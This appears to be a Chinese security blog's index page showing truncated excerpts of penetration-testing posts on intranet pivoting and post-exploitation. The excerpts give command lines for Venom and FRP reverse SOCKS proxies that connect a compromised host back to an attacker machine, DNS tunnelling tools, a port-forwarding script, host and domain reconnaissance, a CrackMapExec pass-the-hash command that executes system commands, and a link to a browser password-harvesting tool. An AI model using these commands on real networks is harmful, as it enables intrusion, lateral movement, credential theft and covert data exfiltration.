利用venom反向socks代理
2022年01月05日 No comment目标边界: 12.12.12.12 agent.exe ‐rhost 198.118.119.118 ‐rport 9999
攻击机: 198.118.119.118 ./admin_linux_x86 ‐lport 99990x01 攻击机监听./admin_linux_x86 ‐lport 99990x2 靶机反向连接agent.e
阅读全文 »
反弹shell管理工具
2021年12月24日 No commenthttps://github.com/WangYihang/Reverse-Shell-Manager https://github.com/WangYihang/Platypus/releases/ 使用说明https://platypus-reverse-shell.vercel.app/quick-start/
阅读全文 »
DNS隧道工具
2021年12月24日 No commentiodine https://github.com/yarrick/iodine dnscat2 Type:dns解析类型 A CNAME MX TXT 分为直链模式和中继模式 gem install ecdsa gem install salsa20 gem install sha3 gem install trollop https://rubygems.org/gems
阅读全文 »
端口转发python脚本
2021年12月23日 No commentlts.py -listen 80 2222lts.py -slave 10.10.10.10:80 10.10.10.10:3389#!/usr/bin/env python
# coding=utf-8
'''
===============
阅读全文 »
Linux主机信息收集
2021年12月22日 No commentlast 多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像
Ifconfig -a/arp -a/netstat -anopt/ss -nt
ifconfig -a 查看内网ip 网卡 网关
route -n 内网路由情况,也能为内网网络拓扑提供一定的信息
IPtabl
阅读全文 »
Crackmapexec
2021年12月21日 No commentkali下进行安装apt-get install crackmapexecIP:可以是单个ip或者ip段-u:指定用户-H:指定NTLM Hash-d:指定域-x:执行系统命令crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x&n
阅读全文 »
Windows域信息收集提权命令
2021年12月20日 No comment获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent
C:\Users\Administrator\Recent //默认位置
dir %APPDATA%\Microsoft\Windows\Recent
dir 
阅读全文 »
FRP or reGeorg OR tunna
2021年12月20日 No comment利用Frp反向socks代理流量攻击机: 12.12.12.12 frps.exe ‐c frps.ini 开启监听
目标边界: 27.18.19.98  
阅读全文 »
内网抓取密码
2021年12月20日 No comment内网抓取密码https://github.com/QAX-A-Team/BrowserGhost
阅读全文 »
EarthWorm详细用法
2019年07月17日 No comment正向socks v5服务器【适用于目标机器拥有一个外网IP】服务器端执行以下命令ew.exe -s ssocksd -l 888说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。-------------------------------------------------------------------------------------------反弹socks v5服务器【适用于目标机器没有公网IP,但可访问内网资源】本地执行
阅读全文 »